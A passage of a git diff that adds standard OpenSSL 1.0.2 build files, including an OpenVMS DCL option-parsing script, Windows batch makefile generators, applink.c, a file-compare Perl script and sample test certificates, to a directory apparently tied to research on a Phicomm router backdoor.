+$     WRITE SYS$OUTPUT "    BUILDALL :  Same as ALL, except CONFIG, BUILDINF and SOFTILNKS aren't done."
+$     WRITE SYS$OUTPUT "    CRYPTO   :  To Build Just The [.xxx.EXE.CRYPTO]LIBCRYPTO.OLB Library."
+$     WRITE SYS$OUTPUT "    CRYPTO/x :  To Build Just The x Part Of The"
+$     WRITE SYS$OUTPUT "                [.xxx.EXE.CRYPTO]LIBCRYPTO.OLB Library."
+$     WRITE SYS$OUTPUT "    SSL      :  To Build Just The [.xxx.EXE.SSL]LIBSSL.OLB Library."
+$     WRITE SYS$OUTPUT "    SSL_TASK :  To Build Just The [.xxx.EXE.SSL]SSL_TASK.EXE Program."
+$     WRITE SYS$OUTPUT "    TEST     :  To Build Just The OpenSSL Test Programs."
+$     WRITE SYS$OUTPUT "    APPS     :  To Build Just The OpenSSL Application Programs."
+$     WRITE SYS$OUTPUT "    ENGINES  :  To Build Just The ENGINES"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT " Where 'xxx' Stands For:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    ALPHA[64]:  Alpha Architecture."
+$     WRITE SYS$OUTPUT "    IA64[64] :  IA64 Architecture."
+$     WRITE SYS$OUTPUT "    VAX      :  VAX Architecture."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     GOTO TIDY
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P1 Check.
+$!
+$ ENDIF
+$!
+$! Check P2 (POINTER_SIZE).
+$!
+$ IF (P2 .NES. "") .AND. (ARCH .NES. "VAX")
+$ THEN
+$!
+$   IF (P2 .EQS. "32")
+$   THEN
+$     POINTER_SIZE = "32"
+$   ELSE
+$     POINTER_SIZE = F$EDIT( P2, "COLLAPSE, UPCASE")
+$     IF ((POINTER_SIZE .EQS. "64") .OR. -
+       (POINTER_SIZE .EQS. "64=") .OR. -
+       (POINTER_SIZE .EQS. "64=ARGV"))
+$     THEN
+$       ARCHD = ARCH+ "_64"
+$       LIB32 = ""
+$     ELSE
+$!
+$!      Tell The User Entered An Invalid Option.
+$!
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", P2, -
+         " Is Invalid.  The Valid Options Are:"
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT -
+         "    """"       :  Compile with default (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    32       :  Compile with 32-bit (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    64       :  Compile with 64-bit (long) pointers (auto ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=      :  Compile with 64-bit (long) pointers (no ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=ARGV  :  Compile with 64-bit (long) pointers (ARGV)."
+$       WRITE SYS$OUTPUT ""
+$! 
+$!      Time To EXIT.
+$!
+$       GOTO TIDY
+$!
+$     ENDIF
+$!
+$   ENDIF
+$!
+$! End The P2 (POINTER_SIZE) Check.
+$!
+$ ENDIF
+$!
+$! Check To See If P3 Is Blank.
+$!
+$ IF (P3.EQS."NODEBUG")
+$ THEN
+$!
+$!   P3 Is NODEBUG, So Compile Without Debugger Information.
+$!
+$    DEBUGGER = "NODEBUG"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Check To See If We Are To Compile With Debugger Information.
+$!
+$   IF (P3.EQS."DEBUG")
+$   THEN
+$!
+$!    Compile With Debugger Information.
+$!
+$     DEBUGGER = "DEBUG"
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Tell The User Entered An Invalid Option.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P3," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    DEBUG    :  Compile With The Debugger Information."
+$     WRITE SYS$OUTPUT "    NODEBUG  :  Compile Without The Debugger Information."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     GOTO TIDY
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P3 Check.
+$!
+$ ENDIF
+$!
+$! Check To See If P4 Is Blank.
+$!
+$ IF (P4.EQS."")
+$ THEN
+$!
+$!  O.K., The User Didn't Specify A Compiler, Let's Try To
+$!  Find Out Which One To Use.
+$!
+$!  Check To See If We Have GNU C.
+$!
+$   IF (F$TRNLNM("GNU_CC").NES."")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     COMPILER = "GNUC"
+$!
+$!    Tell The User We Are Using GNUC.
+$!
+$     WRITE SYS$OUTPUT "Using GNU 'C' Compiler."
+$!
+$!  End The GNU C Compiler Check.
+$!
+$   ENDIF
+$!
+$!  Check To See If We Have VAXC Or DECC.
+$!
+$   IF (F$GETSYI("CPU").GE.128).OR.(F$TRNLNM("DECC$CC_DEFAULT").EQS."/DECC")
+$   THEN 
+$!
+$!    Looks Like DECC, Set To Use DECC.
+$!
+$     COMPILER = "DECC"
+$!
+$!    Tell The User We Are Using DECC.
+$!
+$     WRITE SYS$OUTPUT "Using DECC 'C' Compiler."
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Looks Like VAXC, Set To Use VAXC.
+$!
+$     COMPILER = "VAXC"
+$!
+$!    Tell The User We Are Using VAX C.
+$!
+$     WRITE SYS$OUTPUT "Using VAXC 'C' Compiler."
+$!
+$!  End The DECC & VAXC Compiler Check.
+$!
+$   ENDIF
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Check To See If The User Entered A Valid Parameter.
+$!
+$   IF (P4.EQS."VAXC").OR.(P4.EQS."DECC").OR.(P4.EQS."GNUC")!.OR.(P4.EQS."LINK")
+$   THEN
+$!
+$!    Check To See If The User Wanted To Just LINK.
+$!
+$     IF (P4.EQS."LINK")
+$     THEN
+$!
+$!      Looks Like LINK-only
+$!
+$       COMPILER = "LINK"
+$!
+$!      Tell The User We Are Only Linking.
+$!
+$       WRITE SYS$OUTPUT "LINK Only.  This actually NOT YET SUPPORTED!"
+$!
+$!    End LINK Check.
+$!
+$     ENDIF
+$!
+$!    Check To See If The User Wanted DECC.
+$!
+$     IF (P4.EQS."DECC")
+$     THEN
+$!
+$!      Looks Like DECC, Set To Use DECC.
+$!
+$       COMPILER = "DECC"
+$!
+$!      Tell The User We Are Using DECC.
+$!
+$       WRITE SYS$OUTPUT "Using DECC 'C' Compiler."
+$!
+$!    End DECC Check.
+$!
+$     ENDIF
+$!
+$!    Check To See If We Are To Use VAXC.
+$!
+$     IF (P4.EQS."VAXC")
+$     THEN
+$!
+$!      Looks Like VAXC, Set To Use VAXC.
+$!
+$       COMPILER = "VAXC"
+$!
+$!      Tell The User We Are Using VAX C.
+$!
+$       WRITE SYS$OUTPUT "Using VAXC 'C' Compiler."
+$!
+$!    End VAXC Check
+$!
+$     ENDIF
+$!
+$!    Check To See If We Are To Use GNU C.
+$!
+$     IF (P4.EQS."GNUC")
+$     THEN
+$!
+$!      Looks Like GNUC, Set To Use GNUC.
+$!
+$       COMPILER = "GNUC"
+$!
+$!      Tell The User We Are Using GNUC.
+$!
+$       WRITE SYS$OUTPUT "Using GNU 'C' Compiler."
+$!
+$!    End The GNU C Check.
+$!
+$     ENDIF
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$   ELSE
+$!
+$!    Tell The User We Don't Know What They Want.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P4," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    VAXC  :  To Compile With VAX C."
+$     WRITE SYS$OUTPUT "    DECC  :  To Compile With DEC C."
+$     WRITE SYS$OUTPUT "    GNUC  :  To Compile With GNU C."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     GOTO TIDY
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P4 Check.
+$!
+$ ENDIF
+$!
+$! Time to check the contents of P5, and to make sure we get the correct
+$! library.
+$!
+$ IF P5.EQS."SOCKETSHR" .OR. P5.EQS."MULTINET" .OR. P5.EQS."UCX" -
+     .OR. P5.EQS."TCPIP" .OR. P5.EQS."NONE"
+$ THEN
+$!
+$!  Check to see if SOCKETSHR was chosen
+$!
+$   IF P5.EQS."SOCKETSHR"
+$   THEN
+$!
+$!    Set the library to use SOCKETSHR
+$!
+$     TCPIP_LIB = "SYS$DISK:[-.VMS]SOCKETSHR_SHR.OPT /OPTIONS"
+$!
+$!    Tell the user
+$!
+$     WRITE SYS$OUTPUT "Using SOCKETSHR for TCP/IP"
+$!
+$!    Done with SOCKETSHR
+$!
+$   ENDIF
+$!
+$!  Check to see if MULTINET was chosen
+$!
+$   IF P5.EQS."MULTINET"
+$   THEN
+$!
+$!    Set the library to use UCX emulation.
+$!
+$     P5 = "UCX"
+$!
+$!    Tell the user
+$!
+$     WRITE SYS$OUTPUT "Using MultiNet via UCX emulation for TCP/IP"
+$!
+$!    Done with MULTINET
+$!
+$   ENDIF
+$!
+$!  Check to see if UCX was chosen
+$!
+$   IF P5.EQS."UCX"
+$   THEN
+$!
+$!    Set the library to use UCX.
+$!
+$     TCPIP_LIB = "SYS$DISK:[-.VMS]UCX_SHR_DECC.OPT /OPTIONS"
+$!
+$!    Tell the user
+$!
+$     WRITE SYS$OUTPUT "Using UCX or an emulation thereof for TCP/IP"
+$!
+$!    Done with UCX
+$!
+$   ENDIF
+$!
+$!  Check to see if TCPIP was chosen
+$!
+$   IF P5.EQS."TCPIP"
+$   THEN
+$!
+$!    Set the library to use TCPIP (post UCX).
+$!
+$     TCPIP_LIB = "SYS$DISK:[-.VMS]TCPIP_SHR_DECC.OPT /OPTIONS"
+$!
+$!    Tell the user
+$!
+$     WRITE SYS$OUTPUT "Using TCPIP (post UCX) for TCP/IP"
+$!
+$!    Done with TCPIP
+$!
+$   ENDIF
+$!
+$!  Check to see if NONE was chosen
+$!
+$   IF P5.EQS."NONE"
+$   THEN
+$!
+$!    Do not use a TCPIP library.
+$!
+$     TCPIP_LIB = ""
+$!
+$!    Tell the user
+$!
+$     WRITE SYS$OUTPUT "A specific TCPIP library will not be used."
+$!
+$!    Done with NONE.
+$!
+$   ENDIF
+$!
+$!  Set the TCPIP_TYPE symbol
+$!
+$   TCPIP_TYPE = P5
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "TCP/IP library spec: ", TCPIP_LIB
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$   IF P5 .NES. ""
+$   THEN
+$!
+$!    Tell The User We Don't Know What They Want.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P5," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    SOCKETSHR  :  To link with SOCKETSHR TCP/IP library."
+$     WRITE SYS$OUTPUT "    UCX        :  To link with UCX TCP/IP library."
+$     WRITE SYS$OUTPUT "    TCPIP      :  To link with TCPIP TCP/IP (post UCX) library."
+$     WRITE SYS$OUTPUT "    NONE       :  To not link with a specific TCP/IP library."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     GOTO TIDY
+$   ELSE
+$!
+$! If TCPIP is not defined, then hardcode it to make
+$! it clear that no TCPIP is desired.
+$!
+$     IF P5 .EQS. ""
+$     THEN
+$       TCPIP_LIB = ""
+$       TCPIP_TYPE = "NONE"
+$     ELSE
+$!
+$!    Set the TCPIP_TYPE symbol
+$!
+$       TCPIP_TYPE = P5
+$     ENDIF
+$   ENDIF
+$!
+$!  Done with TCP/IP libraries
+$!
+$ ENDIF
+$!
+$! Special Threads For OpenVMS v7.1 Or Later
+$!
+$! Written By:  Richard Levitte
+$!              richard@levitte.org
+$!
+$!
+$! Check To See If We Have A Option For P6.
+$!
+$ IF (P6.EQS."")
+$ THEN
+$!
+$!  Get The Version Of VMS We Are Using.
+$!
+$   ISSEVEN :=
+$   TMP = F$ELEMENT(0,"-",F$EXTRACT(1,4,VMS_VERSION))
+$   TMP = F$INTEGER(F$ELEMENT(0,".",TMP)+F$ELEMENT(1,".",TMP))
+$!
+$!  Check To See If The VMS Version Is v7.1 Or Later.
+$!
+$   IF (TMP.GE.71)
+$   THEN
+$!
+$!    We Have OpenVMS v7.1 Or Later, So Use The Special Threads.
+$!
+$     ISSEVEN := ,PTHREAD_USE_D4
+$!
+$!  End The VMS Version Check.
+$!
+$   ENDIF
+$!
+$! End The P6 Check.
+$!
+$ ENDIF
+$!
+$!
+$! Check To See If We Have A ZLIB Option.
+$!
+$ ZLIB = P7
+$ IF (ZLIB .NES. "")
+$ THEN
+$!
+$!  Check for expected ZLIB files.
+$!
+$   err = 0
+$   file1 = f$parse( "zlib.h", ZLIB, , , "SYNTAX_ONLY")
+$   if (f$search( file1) .eqs. "")
+$   then
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     WRITE SYS$OUTPUT "    Can't find header: ''file1'"
+$     err = 1
+$   endif
+$!
+$   file2 = f$parse( ZLIB, "libz.olb", , , "SYNTAX_ONLY")
+$   if (f$search( file2) .eqs. "")
+$   then
+$     if (err .eq. 0)
+$     then
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     endif
+$     WRITE SYS$OUTPUT "    Can't find library: ''file2'"
+$     WRITE SYS$OUTPUT ""
+$     err = err+ 2
+$   endif
+$   if (err .eq. 1)
+$   then
+$     WRITE SYS$OUTPUT ""
+$   endif
+$!
+$   if (err .ne. 0)
+$   then
+$     GOTO TIDY
+$   endif
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "ZLIB library spec: ", file2
+$!
+$! End The ZLIB Check.
+$!
+$ ENDIF
+$!
+$!  Time To RETURN...
+$!
+$ RETURN
+$!
+$ TIDY:
+$!
+$! Close any open files.
+$!
+$ if (f$trnlnm( "h_file", "LNM$PROCESS", 0, "SUPERVISOR") .nes. "") then -
+   close h_file
+$!
+$! Restore the original default device:[directory].
+$!
+$ SET DEFAULT 'DEF_ORIG'
+$!
+$ EXIT
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/.rnd b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/.rnd
new file mode 100644
index 0000000000000000000000000000000000000000..0566b46dfe64e7ac1e6a6c49610d2d5e08e57c93
GIT binary patch
literal 1024
zcmV+b1poUdN$RkC7kV^=SXx>N=2lzx_KLf**VV@3Q?)s68QAgBa;I%PPc^WyZS7HW
zz+5!%-uU6;Y!y5_19D6i2+rT(JTttt6n<aNP_U2(rU%zFCqS$aG|R`4QHu1`-*#_8
zBCOfWjdOr0+4@j`bz+s0=-yWP@7Hu<8_0RNso&)Zm`fNa*D%!zZf2W-rAffmd+S+9
zf%6DiyO8Am4X{tnGqfn_6PfS392yRs^A2yBv(EGhx}J;Noq4lEy_{S-_JPBTSSBc?
z7bZ`4Oe#hl>%P>mN&K)VqU{Rzb8l;)_LUtvgi%FwV~+)Bg;`5zjWITKXGr*~)Lzg&
z_K9^{i9Hgq^_4w@rnw%kRtR#pDcM0#&ng}UtC1B9a~DFTtw3?<89i*R5<qm`j3GJX
zdTc3lxU2#;1K@QGT_FpaNI^L2Q=57jOC&oH<YSoLA<xNfxHx4=she#QNg^wSN^|%D
zZ-}%(0c=+w=^K8liN2EIBP;hJ#658r=1bSxLDalKbUrT98*F*qoYn0?$DIh<;h7ke
zOw{_U<7}{?ow-Xej!Ly4v*1&L-NLL_le|H&M7DDS3^!*(04UjgcSI-jpQ;8#$Oat0
zlI<Jsc#=@7YS`)9Q3DC8iZ=cZ&Ri*73!NhPsIZ<YdD_lEI|Yx4PW~JLHk4+3{?;Mz
z&!8QP1TNy+W$xlkC$iiDMU1`h>m_BI`RUN5rn6IUEyCLE6tE|9*rItR(QzsK!MiO&
zuviVK%&FgeKvQH{OrzSRadJPZ{Ar{YogP;E7>gQe0;r3I^FXcEjspdfEB0}+jfpGT
zP*c2vHk+*rlf<B$|4pA_Cbi*OiMbuQS*}cC{IG7ym%W7n-cS#ZCh^h?o{Mx1>iL*5
zv{_rsf@Ac;w=harwF|8#XG|jN4@%t?3j#<wQ?`1fsP&Br@;WzTjleuEUJk&5Z%z{~
zupG87eE)1=%5-S(Da<msTC0V)Q>IlW0{aYNlp?5;w7*(ycBa;U`l(kkHrdwJa`Vx%
z#don@7N~&J`8P+5g4%W?z5@M|qZU?+wczb8m)%2|)Iucrq$xmuETCSS|NK)QD#ET|
z>0k18>4rEi&cnAF=lE@VKKNDIly=ums~Lb9#MDj#V~DHHR?o5VkCfZ!5cN4Ah_CyO
zTL??7Z|8%j>Gs~S^Rtv1b%Uw<Xdecn3$$UO-DRB|terUg^$}8h2C*FJvn@AZPJ=U=
zT_=a=_~e=0vkU*j8-NNIrc_Xslp^V~(uMRcMaMr{R7YlA5o8CwMQ=-fH3$wJ@f2$l
un~|xlnV))qJ%gUo7?dnKgo0RTl8*SXDz}I&b4A)M+RZVQC_4|1vTJlr?)w`6

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/32all.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/32all.bat
new file mode 100755
index 0000000..aaab9b0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/32all.bat
@@ -0,0 +1,20 @@
+set OPTS=no-asm
+
+perl Configure VC-WIN32
+perl util\mkfiles.pl >MINFO
+perl util\mk1mf.pl %OPTS% debug VC-WIN32 >d32.mak
+perl util\mk1mf.pl %OPTS% VC-WIN32 >32.mak
+perl util\mk1mf.pl %OPTS% debug dll VC-WIN32 >d32dll.mak
+perl util\mk1mf.pl %OPTS% dll VC-WIN32 >32dll.mak
+perl util\mkdef.pl 32 libeay > ms\libeay32.def
+perl util\mkdef.pl 32 ssleay > ms\ssleay32.def
+
+nmake -f d32.mak
+@if errorlevel 1 goto end
+nmake -f 32.mak
+@if errorlevel 1 goto end
+nmake -f d32dll.mak
+@if errorlevel 1 goto end
+nmake -f 32dll.mak
+
+:end
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/README
new file mode 100644
index 0000000..07f1925
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/README
@@ -0,0 +1,13 @@
+Run these makefiles from the top level as in
+nmake -f ms\makefilename
+to build with visual C++ 4.[01].
+
+The results will be in the out directory.
+
+These makefiles and def files were generated by typing
+
+perl util\mk1mf.pl VC-NT >ms/nt.mak
+perl util\mk1mf.pl VC-NT dll >ms/ntdll.mak
+
+perl util\mkdef.pl 32 crypto > ms/crypto32.def
+perl util\mkdef.pl 32 ssl > ms/ssl32.def
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/applink.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/applink.c
new file mode 100644
index 0000000..2831b39
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/applink.c
@@ -0,0 +1,129 @@
+#define APPLINK_STDIN   1
+#define APPLINK_STDOUT  2
+#define APPLINK_STDERR  3
+#define APPLINK_FPRINTF 4
+#define APPLINK_FGETS   5
+#define APPLINK_FREAD   6
+#define APPLINK_FWRITE  7
+#define APPLINK_FSETMOD 8
+#define APPLINK_FEOF    9
+#define APPLINK_FCLOSE  10      /* should not be used */
+
+#define APPLINK_FOPEN   11      /* solely for completeness */
+#define APPLINK_FSEEK   12
+#define APPLINK_FTELL   13
+#define APPLINK_FFLUSH  14
+#define APPLINK_FERROR  15
+#define APPLINK_CLEARERR 16
+#define APPLINK_FILENO  17      /* to be used with below */
+
+#define APPLINK_OPEN    18      /* formally can't be used, as flags can vary */
+#define APPLINK_READ    19
+#define APPLINK_WRITE   20
+#define APPLINK_LSEEK   21
+#define APPLINK_CLOSE   22
+#define APPLINK_MAX     22      /* always same as last macro */
+
+#ifndef APPMACROS_ONLY
+# include <stdio.h>
+# include <io.h>
+# include <fcntl.h>
+
+static void *app_stdin(void)
+{
+    return stdin;
+}
+
+static void *app_stdout(void)
+{
+    return stdout;
+}
+
+static void *app_stderr(void)
+{
+    return stderr;
+}
+
+static int app_feof(FILE *fp)
+{
+    return feof(fp);
+}
+
+static int app_ferror(FILE *fp)
+{
+    return ferror(fp);
+}
+
+static void app_clearerr(FILE *fp)
+{
+    clearerr(fp);
+}
+
+static int app_fileno(FILE *fp)
+{
+    return _fileno(fp);
+}
+
+static int app_fsetmod(FILE *fp, char mod)
+{
+    return _setmode(_fileno(fp), mod == 'b' ? _O_BINARY : _O_TEXT);
+}
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+__declspec(dllexport)
+void **
+# if defined(__BORLANDC__)
+/*
+ * __stdcall appears to be the only way to get the name
+ * decoration right with Borland C. Otherwise it works
+ * purely incidentally, as we pass no parameters.
+ */
+ __stdcall
+# else
+ __cdecl
+# endif
+OPENSSL_Applink(void)
+{
+    static int once = 1;
+    static void *OPENSSL_ApplinkTable[APPLINK_MAX + 1] =
+        { (void *)APPLINK_MAX };
+
+    if (once) {
+        OPENSSL_ApplinkTable[APPLINK_STDIN] = app_stdin;
+        OPENSSL_ApplinkTable[APPLINK_STDOUT] = app_stdout;
+        OPENSSL_ApplinkTable[APPLINK_STDERR] = app_stderr;
+        OPENSSL_ApplinkTable[APPLINK_FPRINTF] = fprintf;
+        OPENSSL_ApplinkTable[APPLINK_FGETS] = fgets;
+        OPENSSL_ApplinkTable[APPLINK_FREAD] = fread;
+        OPENSSL_ApplinkTable[APPLINK_FWRITE] = fwrite;
+        OPENSSL_ApplinkTable[APPLINK_FSETMOD] = app_fsetmod;
+        OPENSSL_ApplinkTable[APPLINK_FEOF] = app_feof;
+        OPENSSL_ApplinkTable[APPLINK_FCLOSE] = fclose;
+
+        OPENSSL_ApplinkTable[APPLINK_FOPEN] = fopen;
+        OPENSSL_ApplinkTable[APPLINK_FSEEK] = fseek;
+        OPENSSL_ApplinkTable[APPLINK_FTELL] = ftell;
+        OPENSSL_ApplinkTable[APPLINK_FFLUSH] = fflush;
+        OPENSSL_ApplinkTable[APPLINK_FERROR] = app_ferror;
+        OPENSSL_ApplinkTable[APPLINK_CLEARERR] = app_clearerr;
+        OPENSSL_ApplinkTable[APPLINK_FILENO] = app_fileno;
+
+        OPENSSL_ApplinkTable[APPLINK_OPEN] = _open;
+        OPENSSL_ApplinkTable[APPLINK_READ] = _read;
+        OPENSSL_ApplinkTable[APPLINK_WRITE] = _write;
+        OPENSSL_ApplinkTable[APPLINK_LSEEK] = _lseek;
+        OPENSSL_ApplinkTable[APPLINK_CLOSE] = _close;
+
+        once = 0;
+    }
+
+    return OPENSSL_ApplinkTable;
+}
+
+#ifdef __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/bcb4.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/bcb4.bat
new file mode 100755
index 0000000..00fb9e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/bcb4.bat
@@ -0,0 +1,6 @@
+perl Configure BC-32
+perl util\mkfiles.pl > MINFO
+
+@rem create make file
+perl util\mk1mf.pl no-asm BC-NT > bcb.mak
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/certCA.srl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/certCA.srl
new file mode 100644
index 0000000..2cfaa3b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/certCA.srl
@@ -0,0 +1 @@
+1D
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/certCA.ss b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/certCA.ss
new file mode 100644
index 0000000..b48c657
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/certCA.ss
@@ -0,0 +1,10 @@
+-----BEGIN CERTIFICATE-----
+MIIBXDCCAQYCAQAwDQYJKoZIhvcNAQEEBQAwOTELMAkGA1UEBhMCQVUxFzAVBgNV
+BAoTDkRvZGd5IEJyb3RoZXJzMREwDwYDVQQDEwhEb2RneSBDQTAeFw05ODA3MjEw
+NjUwMTZaFw05ODA4MjAwNjUwMTZaMDkxCzAJBgNVBAYTAkFVMRcwFQYDVQQKEw5E
+b2RneSBCcm90aGVyczERMA8GA1UEAxMIRG9kZ3kgQ0EwXDANBgkqhkiG9w0BAQEF
+AANLADBIAkEA0DQLenM/ncK6CwSEJhOO1WfZUPUEi4pvos9fHW459jh3rRDADgi3
+fiCYxoRVSQhvB47kDZ3ViNg5yrDhy7F9ywIDAQABMA0GCSqGSIb3DQEBBAUAA0EA
+S564l3SBxJ+QcIXthGGDyP5zkxTf/1fHfelW9LNgu6lZTdy9Dlp/NecPekzRmZEM
+WiGXGkKNeuo8PsnGJHP9Qg==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/certU.ss b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/certU.ss
new file mode 100644
index 0000000..095ea14
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/certU.ss
@@ -0,0 +1,10 @@
+-----BEGIN CERTIFICATE-----
+MIIBcTCCARsCARwwDQYJKoZIhvcNAQEEBQAwOTELMAkGA1UEBhMCQVUxFzAVBgNV
+BAoTDkRvZGd5IEJyb3RoZXJzMREwDwYDVQQDEwhEb2RneSBDQTAeFw05ODA3MjEw
+NjUwMjdaFw05ODA4MjAwNjUwMjdaME4xCzAJBgNVBAYTAkFVMRcwFQYDVQQKEw5E
+b2RneSBCcm90aGVyczESMBAGA1UEAxMJQnJvdGhlciAxMRIwEAYDVQQDEwlCcm90
+aGVyIDIwXDANBgkqhkiG9w0BAQEFAANLADBIAkEA0e4qorOr/zuLB9NvRaXhJVaI
+HaGGasa7eMAjVPitWAXkN+DxXiGH1CnMgQraKiYzsEVP15xtxkevEvK5jJpOwwID
+AQABMA0GCSqGSIb3DQEBBAUAA0EAZhcPV+SWwaszFuDTYc6fUurcV9OeXUqoxSQy
+MnLZPTyWubHbbkUr9fUfdf7Cc7dFqGzag05VHkNQUS9VjMzjIQ==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/cmp.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/cmp.pl
new file mode 100644
index 0000000..95b257f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/cmp.pl
@@ -0,0 +1,47 @@
+#!/usr/local/bin/perl
+
+($#ARGV == 1) || die "usage: cmp.pl <file1> <file2>\n";
+
+open(IN0,"<$ARGV[0]") || die "unable to open $ARGV[0]\n";
+open(IN1,"<$ARGV[1]") || die "unable to open $ARGV[1]\n";
+binmode IN0;
+binmode IN1;
+
+$tot=0;
+$ret=1;
+for (;;)
+	{
+	$n1=sysread(IN0,$b1,4096);
+	$n2=sysread(IN1,$b2,4096);
+
+	last if ($n1 != $n2);
+	last if ($b1 ne $b2);
+	last if ($n1 < 0);
+	if ($n1 == 0)
+		{
+		$ret=0;
+		last;
+		}
+	$tot+=$n1;
+	}
+
+close(IN0);
+close(IN1);
+if ($ret)
+	{
+	printf STDERR "$ARGV[0] and $ARGV[1] are different\n";
+	@a1=unpack("C*",$b1);
+	@a2=unpack("C*",$b2);
+	for ($i=0; $i<=$#a1; $i++)
+		{
+		if ($a1[$i] ne $a2[$i])
+			{
+			printf "%02X %02X <<\n",$a1[$i],$a2[$i];
+			last;
+			}
+		}
+	$nm=$tot+$n1;
+	$tot+=$i+1;
+	printf STDERR "diff at char $tot of $nm\n";
+	}
+exit($ret);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_ms.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_ms.bat
new file mode 100755
index 0000000..55014d3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_ms.bat
@@ -0,0 +1,11 @@
+
+perl util\mkfiles.pl >MINFO
+perl util\mk1mf.pl no-asm VC-WIN32 >ms\nt.mak
+perl util\mk1mf.pl dll no-asm VC-WIN32 >ms\ntdll.mak
+if x%OSVERSION% == x goto skipce
+perl util\mk1mf.pl no-asm VC-CE >ms\ce.mak
+perl util\mk1mf.pl dll no-asm VC-CE >ms\cedll.mak
+:skipce
+
+perl util\mkdef.pl 32 libeay > ms\libeay32.def
+perl util\mkdef.pl 32 ssleay > ms\ssleay32.def
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_nasm.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_nasm.bat
new file mode 100755
index 0000000..7b3f3ed
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_nasm.bat
@@ -0,0 +1,8 @@
+
